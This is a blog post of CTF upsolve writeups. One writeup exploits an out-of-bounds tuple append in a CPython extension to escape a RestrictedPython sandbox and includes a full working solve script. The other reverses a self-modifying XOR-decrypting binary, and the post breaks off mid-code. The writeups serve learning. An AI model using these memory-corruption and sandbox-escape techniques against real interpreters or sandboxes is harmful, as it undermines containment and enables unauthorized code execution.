sctf/upsolves

recommended listening for this post is 明日にはすべてが終わるとして by kinokoteikoku.


azazo and i did this ctf alongside one other friend. the event is long gone now but i decided to upsolve this python pwn challenge by samuzora that i thought was really fun. it took me about 8 hours.

edit 24th jan i also upsolved one of the unsolved revs, attached below

pwn/mutuple

I made tuples mutable… you can call them mutuples ecks dee

by samuzora

0 solves

wah 0 solves fucking kena this one

the challenge introduces a custom mutuple library with an append function.

#define PY_SSIZE_T_CLEAN
#include <python3.9/Python.h>

PyObject *PyInit_mutuple(void);

static PyObject *method_append(PyObject *, PyObject *);

PyMethodDef methods[] = { 
  {
    .ml_name = "append",
    .ml_meth = method_append,
    .ml_flags = METH_VARARGS
  }
};

PyModuleDef definition = {
  .m_name = "mutuple",
  .m_methods = methods,
};

PyObject *PyInit_mutuple() {
  PyModule_Create(&definition);
}

static PyObject *method_append(PyObject *self, PyObject *args) {
  PyTupleObject *the_tuple = NULL;
  PyObject *to_add = NULL;

  if (!PyArg_UnpackTuple(args, "ref", 2, 2, &the_tuple, &to_add)) {
    return NULL;
  }

  if (!PyTuple_Check(the_tuple)) {
    PyErr_SetString(PyExc_TypeError, "first argument must be of type tuple");
    return NULL;
  }

  the_tuple->ob_item[the_tuple->ob_base.ob_size++] = to_add;

  return Py_True;
}

setup

getting this setup on your local machine is actually nontrivial, esp. if you want debug symbols on python (which are super nice to have due to the struct definitions being given for you). consulting the Dockerfile we can see that it’s python 3.9, so let’s get python 3.9 and compile it with debug symbols. the process for this is shown in my rev/disthis writeup over on the slight-smile website (check us out ^_^) so i won’t belabor the point.

the key thing you’ll want to do is copy the provided compiled library (with debug symbols also, bless u lucas) into the correct directory, in this case it’s /Python-3.9.0/build/lib.linux-x86_64-3.9-pydebug.

navi@curette (.linux-x86_64-3.9-pydebug) > ls
array.cpython-39d-x86_64-linux-gnu.so             _opcode.cpython-39d-x86_64-linux-gnu.so
_asyncio.cpython-39d-x86_64-linux-gnu.so          ossaudiodev.cpython-39d-x86_64-linux-gnu.so
audioop.cpython-39d-x86_64-linux-gnu.so           parser.cpython-39d-x86_64-linux-gnu.so
binascii.cpython-39d-x86_64-linux-gnu.so          _pickle.cpython-39d-x86_64-linux-gnu.so
_bisect.cpython-39d-x86_64-linux-gnu.so           _posixshmem.cpython-39d-x86_64-linux-gnu.so
_blake2.cpython-39d-x86_64-linux-gnu.so           _posixsubprocess.cpython-39d-x86_64-linux-gnu.so

this is where all the library nonsense lies. we can verify that the library is installed by calling from mutuple import *, here is me demoing the functionality.

>>> from mutuple import append
>>> a = (1,)
>>> append(a, 2)
True
>>> a
(1, 2)

lovely let’s get on with the solve

primitive: oob write of pointers

to be honest i didn’t actually dig too deep into the source code itself, i just kept whacking in gdb until i got a crash. but to explain the functionality, there’s no quote-unquote ‘bounds’ check as to the allocated area dedicated for the tuple, so if we keep appending to the given tuple, we’ll inevitably overwrite some adjacent tuples.

a major problem and annoyance w/ python pwn is that python seems to allocate objects wherever the fuck it feels like, thus making offsets wildly inconsistent. you can have a working solve script that relies on a baked-in offset, keep making edits to it, and then it completely whacks up the offset. we circumvent this by allocating a bunch of tuples, checking the offsets of adjacent items in memory, and just hoping we get a nice number. here is some code that does exactly that, we just spray and pray and hope for two tuples at offset 0x50 from one another.

vals = []
vm = lambda x: print_(hex(id(x)))

for i in range(10000):
    vals.append((i,))
    if i > 1:
        if id(vals[i]) - id(vals[i-1]) == 0x50:
            offset = i-1
            break

vm(vals[offset])
vm(vals[offset + 1])
input('...')

at this point in the challenge it behooves us to learn a bit more about the PyTupleObject struct as defined in CPython. lucas samuzora tan has a really good deep-dive into this on his author writeup for the challenge so i won’t belabor the point, i’ll just go over what is strictly necessary to solve the challenge. we’ll get the address of one of our tuples and poke around in it in gdb.

again, note that compiling with symbols is really nice because we can automatically resolve all these type definitions and struct formats.

gef> p *(PyTupleObject*)0x7ffff755ce10
$1 = {
  ob_base = {
    ob_base = {
      ob_refcnt = 0x1,
      ob_type = 0x5555558fc020 <PyTuple_Type>
    },
    ob_size = 0x1
  },
  ob_item = {
    [0x0] = 0x7ffff7cb6380
  }
}

the important things here are ob_size, ob_type, and ob_item. ob_size is the number of items in the tuple, ob_type is a pointer to the type object in Python, and ob_item is an array containing pointers to everything in the tuple.
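if you don't have a debug build handy, the same three fields can be peeked at from a normal interpreter. this is just a minimal sketch, assuming CPython (where id() is the object's address); peek_tuple is a name i made up, and the offsets are derived from __basicsize__ rather than hardcoded, on the assumption that ob_type is the last field of the object header.

```python
import ctypes

def peek_tuple(t):
    """read a live tuple's header fields straight out of memory (CPython only)."""
    ptr = ctypes.sizeof(ctypes.c_void_p)
    base = id(t)                            # in CPython, id() is the object's address
    type_off = object.__basicsize__ - ptr   # assumption: ob_type is the last field of PyObject
    size_off = object.__basicsize__         # ob_size comes right after the PyObject header
    item_off = tuple.__basicsize__          # ob_item[] starts where the fixed-size part ends
    return {
        "ob_type": ctypes.c_void_p.from_address(base + type_off).value,
        "ob_size": ctypes.c_ssize_t.from_address(base + size_off).value,
        "ob_item0": ctypes.c_void_p.from_address(base + item_off).value,
    }

marker = object()
t = (marker,)
fields = peek_tuple(t)
print({name: hex(value) for name, value in fields.items()})
print(fields["ob_type"] == id(tuple), fields["ob_item0"] == id(marker))
```

none of this is usable inside the challenge sandbox (no ctypes there), it's only a way to convince yourself what each slot holds.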

viewing the raw bytes and eyepowering the structs we can see the two tuples, almost side-by-side:

gef> x/16x 0x7ffff759f820

[here is the first tuple]
0x7ffff759f820:	0x0000000000000001	0x00005555558fc020
0x7ffff759f830:	0x0000000000000001	0x00007ffff7cb3e40 <- [here is the first object]
0x7ffff759f840:	0xfdfdfdfdfdfdfdfd	0xdddddddddddddddd

[i have no idea what this nonsense is]
0x7ffff759f850:	0x3000000000000000	0xfdfdfdfdfdfdfd6f
0x7ffff759f860:	0x0000555555949fb0	0x00007ffff759f810

[here is the second tuple]
0x7ffff759f870:	0x0000000000000001	0x00005555558fc020
0x7ffff759f880:	0x0000000000000001	0x00007ffff7cb3e80
0x7ffff759f890:	0xfdfdfdfdfdfdfdfd	0xdddddddddddddddd

the tuples are basically almost kissing. given that each append() writes one qword, we can eyepower and see we need to append 6 qwords to get through all the garbage in between (the 0xfd/0xdd bytes are pymalloc's debug-build padding, and the two pointers right before the second tuple are its GC header), and then our next append() would start impacting struct metadata. we whack once to impact ob_refcnt, then another time to whack ob_type.

for i in range(6):
    append(vals[offset], 'rawr')

append(vals[offset], 'woof') # <- now we whack the ob_refcnt, which doesnt do much
append(vals[offset], 'meow') # <- this one kena whack the ob_type

print_('tuple type > ', type(vals[offset + 1]))
input('...')

running this, we’ll see that our type for the second tuple is now altered.

starting the exploit...
0x7ff988963be0
0x7ff988963c30
tuple type >  meow

epic. an important caveat of this write is that we are currently unable to write arbitrary bytes, just pointers to objects. say, if we wanted to write nulls to some fields, we just couldn’t, because no Python function is able to return a nullptr without erroring out.

so what do we do? given that we can still whack ob_size, we can create a tuple that’s just, really fucking big:

for i in range(6):
    append(vals[offset], 'rawr')

append(vals[offset], 'woof')
append(vals[offset], tuple) # <- we actually don't want to alter our struct's type here
append(vals[offset], 'meow') # <- this whacks the ob_size

vuln = vals[offset+1]
print_('tuple type > ', type(vuln))
print_('tuple size > ', len(vuln))
input('...')

a neat hack here is that if we want to get to ob_size, we’ll naturally have to whack ob_type. we don’t actually want to whack ob_type! but since we’re able to write pointers, we have access to the tuple pointer by directly writing tuple.

this results in our huge tuple.

navi@curette (ves/pwn-mutuple/src/chall) > cp fuzz.py /tmp/fuzz.py; ./python run.py fuzz.py
starting the exploit...
0x7f3ccf0b0190
0x7f3ccf0b01e0
tuple type >  <class 'tuple'>
tuple size >  139899148097392
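the append counts used so far can be sanity-checked with a bit of arithmetic. a minimal sketch, assuming the 64-bit layout from the gdb dumps (ob_refcnt at +0x00, ob_type at +0x08, ob_size at +0x10, ob_item at +0x18); appends_before is a hypothetical helper, not part of the challenge.

```python
PTR = 8  # one append() writes one pointer-sized slot
OB_REFCNT, OB_TYPE, OB_SIZE, OB_ITEM = 0x00, 0x08, 0x10, 0x18  # assumed 64-bit offsets

def appends_before(field_off, gap, cur_len=1):
    """how many appends are needed BEFORE the one that lands on `field_off`
    of the neighbouring tuple, which sits `gap` bytes after ours."""
    next_slot = OB_ITEM + cur_len * PTR   # where our next append writes, relative to our tuple
    target = gap + field_off              # neighbour's field, relative to our tuple
    if target < next_slot or (target - next_slot) % PTR:
        raise ValueError("field is not reachable with whole-qword appends")
    return (target - next_slot) // PTR

# debug build from the dumps above: tuples 0x50 apart
print(appends_before(OB_REFCNT, 0x50))  # 6 filler appends, the 7th hits ob_refcnt
print(appends_before(OB_SIZE, 0x50))    # 8 appends, the 9th hits ob_size
```

so with a 0x50 gap it's 6 fillers, then ob_refcnt, ob_type, ob_size in that order, which matches the 'rawr' / 'woof' / tuple / 'meow' sequence above.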

this gives us an OOB read. the thing is, we still can’t read raw bytes, because when we index into the tuple, it dereferences the pointer at that index of the ob_item array - it doesn’t actually return the bytes themselves.

the question then becomes: how do we forge bytes? in other python pwn a really handy tool is bytearray, but the challenge does not give us access to this :(

instead we can just write bytes, with, well, bytes. the bytes object actually does contain the raw bytes written to it as a contiguous section in one of its struct fields. let’s demonstrate by creating a bytes object and analysing it.

b = b'rawr rawr woof'
print_(hex(id(b)))
input('...')

hopping into gef:

gef> p *(PyBytesObject*)0x7ffff755c8b0
$2 = {
  ob_base = {
    ob_base = {
      ob_refcnt = 0x2,
      ob_type = 0x5555558ed400 <PyBytes_Type>
    },
    ob_size = 0xe
  },
  ob_shash = 0xb57bd7371431d8f2,
  ob_sval = "r"
}

the ob_sval field is what we want here. we can print this as a string and verify the bytes are there.

gef> x/g (*(PyBytesObject*) 0x7ffff755c900)->ob_sval
0x7ffff755c920:	0x7761722072776172
gef> x/s (*(PyBytesObject*) 0x7ffff755c900)->ob_sval
0x7ffff755c920:	"rawr rawr woof"

so this becomes our handy primitive to create raw bytes. we’ll use this to forge pointers to objects in the Python namespace - because we now have a really large tuple, as long as our forged tuple is before our forged bytes object in memory, we can just access it by indexing into the tuple.
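to make the "bytes as a fake pointer" idea concrete, here's a small sketch run outside the sandbox. it assumes 64-bit CPython, and it assumes ob_sval sits one byte before the end of the fixed-size part of the object (that's where bytes.__basicsize__ - 1 comes from); sval_addr is a made-up helper name. nothing gets dereferenced here, it only reads back the 8 bytes we put in.

```python
import ctypes
import struct

def sval_addr(b):
    # assumption: ob_sval is the trailing char[1] member of PyBytesObject
    return id(b) + bytes.__basicsize__ - 1

target = object()                           # stand-in for whatever we want to point at
fake_ptr = struct.pack("<Q", id(target))    # 8 little-endian bytes == one pointer-sized slot

raw = ctypes.string_at(sval_addr(fake_ptr), len(fake_ptr))
as_qword = ctypes.c_uint64.from_address(sval_addr(fake_ptr)).value

print(raw == fake_ptr)                      # the payload really is stored contiguously
print(hex(as_qword), hex(id(target)))       # read as a qword, it is the address we packed
```

inside the sandbox there's no struct or ctypes, which is why the solve script builds the same 8 bytes with int.to_bytes instead.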

we will have to figure out something nice to forge. let’s actually look at the set-up for the challenge (it accepts a base64 encoded .py file and runs it with severe restrictions):

#!/usr/bin/python3.9 -u
from mutuple import append
from sys import modules, argv
del modules['os']
keys = list(__builtins__.__dict__.keys())

from RestrictedPython import compile_restricted, safe_builtins
from RestrictedPython.Eval import default_guarded_getiter
from RestrictedPython.Guards import full_write_guard

from operator import getitem

def _inplacevar_(op, var, expr):
    if op == "+=":
            return var + expr
    elif op == "-=":
            return var - expr
    elif op == "*=":
        return var * expr
    elif op == "/=":
        return var / expr
    elif op == "%=":
        return var % expr
    elif op == "**=":
        return var ** expr
    elif op == "<<=":
        return var << expr
    elif op == ">>=":
        return var >> expr
    elif op == "|=":
        return var | expr
    elif op == "^=":
        return var ^ expr
    elif op == "&=":
        return var & expr
    elif op == "//=":
        return var // expr
    elif op == "@=":
        return var // expr

filename = argv[1]
with open(f"/tmp/{filename}", "r") as file:
    builtins = safe_builtins
    builtins["_getitem_"] = getitem
    builtins["_getiter_"] = default_guarded_getiter
    builtins["_inplacevar_"] = _inplacevar_
    builtins["_write_"] = full_write_guard
    builtins["bytes"] = bytes
    builtins["chr"] = chr
    builtins["input"] = input
    builtins["append"] = append
    builtins["ord"] = ord
    builtins["print_"] = print # allow printing in sandbox
    builtins["type"] = type
    print('starting the exploit...')
    exec(
        compile_restricted(file.read(), filename="<inline-code>", mode="exec"),
        {"__builtins__": builtins},
        None
    )

this specifically gates access to python’s builtins and replaces it with a safer version. the thing is though, this builtins module still exists in the memory, and we can find, reference, and forge a pointer to this module.
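a stripped-down illustration of that point, without RestrictedPython at all: handing exec() a custom __builtins__ only changes name lookup, it doesn't remove anything from the process. the sandbox_globals dict here is hypothetical and much smaller than safe_builtins.

```python
import builtins

# hypothetical, tiny stand-in for the challenge's restricted builtins
sandbox_globals = {"__builtins__": {"len": len}}

try:
    exec("open", sandbox_globals)   # name lookup only, nothing gets opened
    open_visible = True
except NameError:
    open_visible = False

print(open_visible)                 # the sandboxed code can't name open...
print(hasattr(builtins, "open"))    # ...but the real module still has it
```

so the job is never to "re-enable" open, just to get hold of a pointer to the module object that still has it.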

of course, we cannot directly reference it by calling id(), but since it’s defined in the python heap somewhere (I Think), we can work off the assumption that it’s at a fixed offset from other objects, and just subtract and add accordingly - this is similar to how actual C pwn works, of course (finding libc addresses, so on so forth).

the quote unquote ‘reference’ point i use is id(0). to actually debug and find the offset i just patched in a reference to the builtins module in run.py as so:

builtins["type"] = type
builtins["ref"] = __builtins__

then in the solve script, we run this a few times and make sure the offset is constant.

vuln = vals[offset+1]
print_('offset to builtins > ', hex(id(0) - id(ref)))

all that’s left to do is:

a - create a bytes object whose bytestring is a pointer to builtins.

b - calculate the offset from the bytes object to our forged “big” tuple.

c - index into the tuple and retrieve our reference to builtins.

d - win!

now, this handwaves over a lot of concerns which a more competent pwner could’ve overcome in less than 10 minutes but i, level 2 mafia rookie, stumbled over for a few hours (making sure that the offsets are correctly calculated, making sure that the tuple is placed before the bytestring, dynamically accommodating for essentially ‘random’ offsets because python fucking hates me i guess).

but the solvepath is sound, and it does work. here is the full solvescript, for posterity:

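vals = []

# spray 1-tuples until two of them land exactly 0x30 apart
for i in range(10000):
    vals.append((i,))
    if i > 1:
        if id(vals[i]) - id(vals[i-1]) == 0x30:
            offset = i-1
            break

# run off the end of vals[offset] and into its neighbour's header
for i in range(3):
    append(vals[offset], 'rawr xd')   # fillers, the last one lands on ob_refcnt
append(vals[offset], tuple)           # ob_type: keep it a tuple
append(vals[offset], type)            # ob_size: any pointer makes a huge length
append(vals[offset], str)
append(vals[offset], int)
append(vals[offset], complex)

vuln = vals[offset+1]
# debug only: `ref` exists only in the patched run.py, drop this line on remote
print_('offset to builtins > ', hex(id(0) - id(ref)))
print_('type of vuln >', type(vuln))
addr_to_write = id(0) - 0x38010

obj = addr_to_write.to_bytes(8, byteorder='little')

byte_overwrite = []

# keep building fresh bytes objects holding the fake pointer until one
# lands less than 0x1000 bytes after vuln
for attempt in range(1, 10000):
    f = b''
    for byte in obj:
        f += byte.to_bytes(1, 'big')
    byte_overwrite.append(f)
    delta = id(f) - id(vuln)
    if 0x1000 > delta > 0x0:
        print_(hex(delta))
        break

f = byte_overwrite[-1]
# index of the ob_item slot that overlaps f's raw bytes
target_idx = (id(f) - id(vuln) + 0x08) // 8
print_('target_idx > ', target_idx)
print_('target_addr >', addr_to_write)
a = vuln[target_idx].open("flag.txt").read()
print_(a)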
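the `+ 0x08` in target_idx looks magic, so here is where it plausibly comes from. a sketch under the assumption that, on this 64-bit CPython 3.9 build, ob_item starts 0x18 bytes into a tuple and ob_sval starts 0x20 bytes into a bytes object; payload_index is a hypothetical helper and the addresses are made up.

```python
OB_ITEM_OFF = 0x18   # assumed offsetof(PyTupleObject, ob_item)
OB_SVAL_OFF = 0x20   # assumed offsetof(PyBytesObject, ob_sval)

def payload_index(tuple_addr, bytes_addr):
    """index i such that &tuple->ob_item[i] is the first raw byte of the bytes object."""
    delta = (bytes_addr + OB_SVAL_OFF) - (tuple_addr + OB_ITEM_OFF)
    if delta < 0 or delta % 8:
        raise ValueError("payload is not at a qword slot after the tuple")
    return delta // 8

tuple_addr = 0x7f0000001000          # made-up address for the oversized tuple
bytes_addr = tuple_addr + 0x350      # made-up address for the bytes object
print(payload_index(tuple_addr, bytes_addr))
print((bytes_addr - tuple_addr + 0x08) // 8)   # the formula used in the solve script
```

0x20 - 0x18 is 0x08, so the two expressions agree whenever the bytes object sits after the tuple on an 8-byte boundary.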

closing

funny story is that this challenge took me really long to solve (around 8 hours) because i kept fucking up and making a bunch of mistakes. i had the primitive very early on and just spent so much time skillissuing on really trivial parts of the challenge :S

i wanted to make my solve libc-agnostic because i couldn’t be bothered to properly figure out how the docker container treats its libcs, so i went with the pyjail-style builtins retrieval.

thanks to lucas for the fun pwn!

rev/helloworld

name: Hello, World!

author: Elma

description: ‘I wrote my first program ever. Of course it just prints Hello World!’

solves: 0

very weird challenge involving some obfuscation that i didn’t fully understand, but even without understanding everything you can get a good idea of what is going on. i loosely knew going in that there would be some anti-decompilation techniques, so i didn’t bother decompiling anything at all and just rawdogged the asm instead.

first things first is if we strace the binary we can see some rather suspicious calls to mprotect()

mprotect(0x55f07ccc0000, 4096, PROT_READ|PROT_WRITE|PROT_EXEC) = 0
mprotect(0x55f07ccc0000, 4096, PROT_READ|PROT_EXEC) = 0
...
write(1, "Hello world!\n", 13Hello world!
)          = 13
exit_group(0)                           = ?
+++ exited with 0 +++

this flips an existing page to RWX (and later back to R-X), which is assuredly not standard behaviour. we can catch any mprotect syscalls in gdb with catch syscall mprotect.

 -> 0x555555555178 0f05                  <__do_global_dtors_aux+0x88>   syscall
    0x55555555517a 4c8d0566000000        <__do_global_dtors_aux+0x8a>   lea    r8, [rip + 0x66] # 0x5555555551e7 <__do_global_dtors_aux+0xf7>
    0x555555555181 4c8d0db0010000        <__do_global_dtors_aux+0x91>   lea    r9, [rip + 0x1b0] # 0x555555555338 <frame_dummy>
    0x555555555188 4c87f4                <__do_global_dtors_aux+0x98>   xchg   rsp, r14
    0x55555555518b 4883ec08              <__do_global_dtors_aux+0x9b>   sub    rsp, 0x8
    0x55555555518f 58                    <__do_global_dtors_aux+0x9f>   pop    rax

[+] Detected syscall (arch:X86, mode:64)
    mprotect(unsigned long start, size_t len, unsigned long prot)
[+] Parameter            Register             Value
    RET                  $rax                 -                   
    NR                   $rax                 0xa
    start                $rdi                 0x0000555555555000  ->  0x08ec8348fa1e0ff3
    len                  $rsi                 0x0000000000001000
    prot                 $rdx                 0x0000000000000007
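to tie the raw 0x7 in $rdx back to the names strace printed, here's a tiny decoder. it's only a sketch: the flag values are the linux ones, hardcoded rather than pulled from a library, and decode_prot is a made-up helper.

```python
# linux values for the mprotect() prot bits (hardcoded on purpose)
PROT_FLAGS = {0x1: "PROT_READ", 0x2: "PROT_WRITE", 0x4: "PROT_EXEC"}

def decode_prot(prot):
    """turn the integer prot argument into the names strace would print."""
    names = [name for bit, name in PROT_FLAGS.items() if prot & bit]
    return "|".join(names) if names else "PROT_NONE"

print(decode_prot(0x7))   # the first mprotect call
print(decode_prot(0x5))   # the second one, which drops write again
```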

we are in some function __do_global_dtors_aux, which is normally a gcc runtime stub that runs global destructors at exit. what it’s meant to do is not important nor relevant, all we know is that it is assuredly not supposed to be mprotecting a region of memory. what region of memory even is that anyway? inspecting in vmmap reveals it’s just some address to a page in the binary itself. the most important thing here is that this page includes the .text section of our binary, so it is RWX-mapping an area including executable code. typically this means the code is self-modifying.

Start              End                Size               Offset             Perm Path
0x0000555555555000 0x0000555555556000 0x0000000000001000 0x0000000000001000 r-x /home/navi/upsolves/Sieberrsec-CTF-2025-Public/finals/re/hello_world/dist/helloworld.elf +0x0  <-  $rbx, $rdi, $rip, $r13

ideally we would trace the instructions executed by the binary but there seems to be some weird control-flow-flattening kind of effect, where sections of these __do_global_dtors_aux blocks are chained together with some trampoline in __libc_start_main.

 -> 0x55555555519a c3                    <__do_global_dtors_aux+0xaa>   ret   

   -> 0x7ffff7c29ebb 4c89f1                <__libc_start_main+0xfb>   mov    rcx, r14
      0x7ffff7c29ebe 4c39742408            <__libc_start_main+0xfe>   cmp    QWORD PTR [rsp + 0x8], r14
      0x7ffff7c29ec3 75e3                  <__libc_start_main+0x103>   jne    0x7ffff7c29ea8 <__libc_start_main+0xe8>
      0x7ffff7c29ec5 e959ffffff            <__libc_start_main+0x105>   jmp    0x7ffff7c29e23 <__libc_start_main+0x63>
      0x7ffff7c29eca 488b1df7ff1e00        <__libc_start_main+0x10a>   mov    rbx, QWORD PTR [rip + 0x1efff7] # 0x7ffff7e19ec8
      0x7ffff7c29ed1 498b3424              <__libc_start_main+0x111>   mov    rsi, QWORD PTR [r12]

indeed, after our mprotect is performed, it does something w/ the registers, rets back to __libc_start_main, and eventually __libc_start_main jumps back into another section of code in __do_global_dtors_aux.

 -> 0x7ffff7c29eb9 ff11                  <__libc_start_main+0xf9>   call   QWORD PTR [rcx] <__do_global_dtors_aux+0xc0>

   -> 0x5555555551b0 8a03                  <__do_global_dtors_aux+0xc0>   mov    al, BYTE PTR [rbx]
      0x5555555551b2 413000                <__do_global_dtors_aux+0xc2>   xor    BYTE PTR [r8], al
      0x5555555551b5 48ffc3                <__do_global_dtors_aux+0xc5>   inc    rbx
      0x5555555551b8 49ffc0                <__do_global_dtors_aux+0xc8>   inc    r8
      0x5555555551bb 4c87f4                <__do_global_dtors_aux+0xcb>   xchg   rsp, r14
      0x5555555551be 4883ec08              <__do_global_dtors_aux+0xce>   sub    rsp, 0x8

oh well. the exact mechanics of this don’t really matter to us. we can just manually step through by spamming stepis until we get back to our relevant code blocks.

and .. here we see a very interesting codeblock, actually.

    0x5555555551ab 8d5050                <__do_global_dtors_aux+0xbb>   lea    edx, [rax+0x50]
    0x5555555551ae 8a00                  <__do_global_dtors_aux+0xbe>   mov    al, BYTE PTR [rax]
 -> 0x5555555551b0 8a03                  <__do_global_dtors_aux+0xc0>   mov    al, BYTE PTR [rbx]
    0x5555555551b2 413000                <__do_global_dtors_aux+0xc2>   xor    BYTE PTR [r8], al
    0x5555555551b5 48ffc3                <__do_global_dtors_aux+0xc5>   inc    rbx
    0x5555555551b8 49ffc0                <__do_global_dtors_aux+0xc8>   inc    r8
    0x5555555551bb 4c87f4                <__do_global_dtors_aux+0xcb>   xchg   rsp, r14
    0x5555555551be 4883ec08              <__do_global_dtors_aux+0xce>   sub    rsp, 0x8
----------------------------------- memory access: $rbx = 0x555555555338 ----
$rbx+ 0x555555555338|+0x0000|+000: 0x48f4874cfa1e0ff3
      0x555555555340|+0x0008|+001: 0xfe1605485808ec83
      0x555555555348|+0x0010|+002: 0x5de9f4874c50ffff
      0x555555555350|+0x0018|+003: 0x48e5894855fffffd

note the memory access and the xor BYTE PTR [r8], al instruction - these addresses are in the page marked RWX, and here we are, xoring the bytes with some key somewhere. we can inspect more of the asm, seeing that it increments the ptr in r8 and xors the bytes in a loop until r8 == r9.

gef> x/16i $rip
=> 0x5555555551b0 <__do_global_dtors_aux+192>:	mov    al,BYTE PTR [rbx]
   0x5555555551b2 <__do_global_dtors_aux+194>:	xor    BYTE PTR [r8],al
   0x5555555551b5 <__do_global_dtors_aux+197>:	inc    rbx
   0x5555555551b8 <__do_global_dtors_aux+200>:	inc    r8
   0x5555555551bb <__do_global_dtors_aux+203>:	xchg   rsp,r14
   0x5555555551be <__do_global_dtors_aux+206>:	sub    rsp,0x8
   0x5555555551c2 <__do_global_dtors_aux+210>:	pop    rax
   0x5555555551c3 <__do_global_dtors_aux+211>:	cmp    r8,r9
   0x5555555551c6 <__do_global_dtors_aux+214>:	jne    0x5555555551ce <__do_global_dtors_aux+222>
   0x5555555551c8 <__do_global_dtors_aux+216>:	add    rax,0x37
   0x5555555551ce <__do_global_dtors_aux+222>:	push   rax
   0x5555555551cf <__do_global_dtors_aux+223>:	xchg   rsp,r14
   0x5555555551d2 <__do_global_dtors_aux+226>:	ret

note that when the loop completes, it adds 0x37 to rax and just hits the same ret instruction that an incomplete loop would hit, so it goes back to that same libc_start_main trampoline thingy with the exact same state aside from rax - this means that rax is somehow used in that trampoline to dictate which block we then go to next.
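stripped of the trampoline noise, the decryption loop is small enough to model in python. this is a sketch of my reading of the asm, not a lifted copy: xor_decrypt is a made-up name, memory is a toy bytearray, and the two 4-byte samples are the first bytes of the key at 0x...338 (f3 0f 1e fa) and of the decrypted block at 0x...1e7 (48 83 fd 02) as they show up in the dumps.

```python
def xor_decrypt(mem, dst, end, key):
    """mem[dst:end] ^= mem[key:...], one byte per trip; returns the final key pointer."""
    # the asm checks r8 against r9 after each byte (do-while); same result for a non-empty range
    while dst != end:          # cmp r8, r9
        mem[dst] ^= mem[key]   # mov al, [rbx] ; xor [r8], al
        key += 1               # inc rbx
        dst += 1               # inc r8
    return key

key_bytes = bytes.fromhex("f30f1efa")   # start of the key, from the $rbx dump
plain = bytes.fromhex("4883fd02")       # start of the decrypted block (cmp rbp, 0x2)
encrypted = bytes(p ^ k for p, k in zip(plain, key_bytes))

mem = bytearray(encrypted + key_bytes)  # toy layout: ciphertext first, key right after
final_key_ptr = xor_decrypt(mem, dst=0, end=4, key=4)
print(mem[:4].hex(), final_key_ptr)
```

the same bookkeeping explains the register dump further down: rbx starts at 0x...338 and advances by r9 - r8 = 0x338 - 0x1e7 = 0x151 bytes, ending at 0x...489.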

however it just doesn’t really matter to reverse more of it because we can just.. keep stepping through and seeing which block we hit. :) doing so reveals that our next endpoint just turns out to be the bytes we XOR’d earlier. (r8 is initialized to 0x5555555551e7, and we end up jumping to 0x5555555551e7).

 -> 0x7ffff7c29eb9 ff11                  <__libc_start_main+0xf9>   call   QWORD PTR [rcx] <__do_global_dtors_aux+0xf7>

   -> 0x5555555551e7 4883fd02              <__do_global_dtors_aux+0xf7>   cmp    rbp, 0x2
      0x5555555551eb 750f                  <__do_global_dtors_aux+0xfb>   jne    0x5555555551fc <__do_global_dtors_aux+0x10c>
      0x5555555551ed 4d8b442408            <__do_global_dtors_aux+0xfd>   mov    r8, QWORD PTR [r12 + 0x8]
      0x5555555551f2 4c8d0d3f010000        <__do_global_dtors_aux+0x102>   lea    r9, [rip + 0x13f] # 0x555555555338 <frame_dummy>
      0x5555555551f9 4831db                <__do_global_dtors_aux+0x109>   xor    rbx, rbx
      0x5555555551fc 4c87f4                <__do_global_dtors_aux+0x10c>   xchg   rsp, r14

our very first cmp then dictates where we branch off to, here it’s a compare to rbp = 0x2. right now our rbp is 0x1.

gef> i r
rax            0x5555555551e7      0x5555555551e7
rbx            0x555555555489      0x555555555489
rcx            0x5555555570a8      0x5555555570a8
rdx            0x7fffffffdca8      0x7fffffffdca8
rsi            0x7fffffffdc98      0x7fffffffdc98
rdi            0x1                 0x1
rbp            0x1                 0x1

this means we take the jne branch, which .. does something, again, with the weird libc_start_main trampoline, but what is important is we immediately hit a branch that just de-mprotects the page and exits out, so that’s no good.

it may be unclear as to how we get rbp to pass our 0x2 check, this just comes down to a knowledge gap: given that we are so early on in the binary (we are in the middle of libc constructor functions that i really have no earthly idea about), rbp here holds argc, the number of command-line arguments including the program name itself. running with no arguments gives 0x1, so passing one argument gets us to 0x2.

(this is the one thing i am unclear about as to how you would ‘figure it out’, i knew enough about the challenge that command-line arguments would be involved, so i just guessed. setting $rbp=2 artificially in gdb and stepping through does end in a segfault where you try to access some nullptr that’s near environment variables on the stack, so i suppose that would be a safe guess then. either way…)

armed w/ that knowledge we can just run the binary with a command-line argument and keep on going, we’ll see another strange xor loop in the following block.

=> 0x55555555521d <__do_global_dtors_aux+301>:	mov    dl,BYTE PTR [r8]
   0x555555555220 <__do_global_dtors_aux+304>:	test   dl,dl
   0x555555555222 <__do_global_dtors_aux+306>:	je     0x555555555238 <__do_global_dtors_aux+328>
   0x555555555224 <__do_global_dtors_aux+308>:	xor    dl,BYTE PTR [r9]
   0x555555555227 <__do_global_dtors_aux+311>:	mov    BYTE PTR [r8],dl
   0x55555555522a <__do_global_dtors_aux+314>:	inc    rbx
   0x55555555522d <__do_global_dtors_aux+317>:	inc    r8
   0x555555555230 <__do_global_dtors_aux+320>:	inc    r9
   0x555555555233 <__do_global_dtors_aux+323>:	sub    r14,0x8
   0x555555555237 <__do_global_dtors_aux+327>:	ret

a few cool things to note here, we load from r8 (a pointer to the argument we pass in on the command line, i.e. argv[1]), and we end when the byte we load is null (i.e. the nullterm for whatever string we use as our argument).

we can verify that r8 points to an address on the stack with vmmap, however we are xoring it with some address in r9, which is an address in the binary. note that the final destination here is just r8, meaning that we are xoring the argument in place as it sits on the stack.

also, $rbx functions as a loop counter. we don’t need a loop counter since we’re using the nullterm of our string as the loop end condition. i am helpfully noting this for later, when this comes up.

gef> vmmap $r8
[ Legend: Code | Heap | Stack | Writable | ReadOnly | None | RWX ]
Start              End                Size               Offset             Perm Path
0x00007ffffffdd000 0x00007ffffffff000 0x0000000000022000 0x0000000000000000 rw- [stack] +0x2102d  <-  $rdx, $rsp, $rsi, $r8, $r12
gef> vmmap $r9
[ Legend: Code | Heap | Stack | Writable | ReadOnly | None | RWX ]
Start              End                Size               Offset             Perm Path
0x0000555555555000 0x0000555555556000 0x0000000000001000 0x0000000000001000 rwx /home/navi/upsolves/Sieberrsec-CTF-2025-Public/finals/re/hello_world/dist/helloworld.elf +0x338  <-  $rax, $rip, $r9, $r13
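here's the same loop modelled in python, as a sketch of my reading of the asm. xor_arg_in_place is a made-up name, and KEY_HEAD is just the first 8 key bytes at 0x...338 as seen in the earlier $rbx dump.

```python
KEY_HEAD = bytes.fromhex("f30f1efa4c87f448")   # first 8 bytes at 0x...338

def xor_arg_in_place(arg, key):
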